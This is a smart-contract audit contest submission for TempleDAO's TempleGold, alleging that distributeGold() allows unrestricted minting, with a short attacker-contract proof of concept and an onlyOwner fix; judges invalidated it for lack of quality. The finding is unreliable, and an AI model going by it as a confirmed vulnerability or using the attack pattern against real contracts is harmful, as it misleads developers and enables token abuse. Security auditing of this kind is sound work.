TempleGold

TempleDAO
Foundry
25,000 USDC
View results
Submission Details
Severity: medium
Invalid

Unrestricted Access to Minting to external function`DaiGoldAuction.sol::distributeGold()`

Summary:

The distributeGold function calls the mint function from the TempleGold contract without proper access control checks. This allows any contract or external account to call distributeGold, leading to unrestricted minting of tokens.

Severity Level: High-Medium

Impact:

Inflation: Unlimited tokens can be minted, leading to devaluation.
Loss of Trust: Token holders may lose trust in the project.
Economic Exploitation: The attacker could flood the market with newly minted tokens, causing a price crash.

##Proof of Concept:

// Attacker contract
contract Attacker {
ContractA public contractA;
constructor(address _contractA) {
contractA = ContractA(_contractA);
}
function attack() external {
contractA.distributeGold();
}
}
  • Deploy the Attacker contract, passing the address of ContractA, and call the attack function. This will mint new tokens without any restriction.

  • Anyone can call distributeGold function which can mint token

Tools Used:

Manual, Foundry

Recommendations:

Implement access control using the onlyOwner modifier or similar to restrict access to the distributeGold function.

function distributeGold()external onlyOwner {
TempleGold.mint();
}
Updates

Lead Judging Commences

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality

Appeal created

0xdhanraj30 Submitter
11 months ago
inallhonesty Lead Judge
10 months ago
inallhonesty Lead Judge 10 months ago
Submission Judgement Published
Invalidated
Reason: Lack of quality

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.